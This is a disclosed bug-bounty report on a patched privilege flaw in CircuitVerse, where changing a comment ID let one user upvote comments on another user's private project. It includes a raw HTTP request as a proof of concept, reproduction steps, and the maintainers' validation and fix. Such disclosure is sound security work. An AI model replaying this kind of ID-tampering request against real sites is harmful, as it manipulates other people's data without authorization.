Improper Privilege Management in circuitverse/circuitverse

Valid

Reported on

Aug 24th 2021


✍️ Description

upvote in any private comment

🕵️‍♂️ Proof of Concept

Bellow request is vulnerable to upvote in any comment of private project

POST /commontator/comments/1312/upvote HTTP/2
Host: circuitverse.org
Cookie: 
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:90.0) Gecko/20100101 Firefox/90.0
Accept: text/javascript, application/javascript, application/ecmascript, application/x-ecmascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://circuitverse.org/users/90744/projects/proje1-20dc2034-2a88-4010-9464-d99fdd64ee71
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
X-Csrf-Token: qnOZ/QTTwZlQC3yXyPIl/NnLvpx14vzlX9B+BZex/eCHlWukjpBB6XxmB4xZkSLa7lpxJtE3gdt06Wmzd6kWaA==
Origin: https://circuitverse.org
Content-Length: 11
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Te: trailers

_method=put

Here in this request change comment id to any comment and it will be upvoted even if the project is private .

STEP

1. There is two user--- user-A and user-B .
2. User-A created a private project and make a comment to this project .
3. Now goto user-B account sent above request to upvote the above private comment .You need to change the comment id to above private comment here .

We have contacted a member of the circuitverse team and are waiting to hear back a year ago
ranjit-git
a year ago

Researcher


@maintainer I see bug is now fixed .
Can you plz mark this report as valid ?

Aboobacker MK validated this vulnerability a year ago
ranjit-git has been awarded the disclosure bounty
The fix bounty is now up for grabs
Aboobacker MK confirmed that a fix has been merged on 13d4cc a year ago
The fix bounty has been dropped
to join this conversation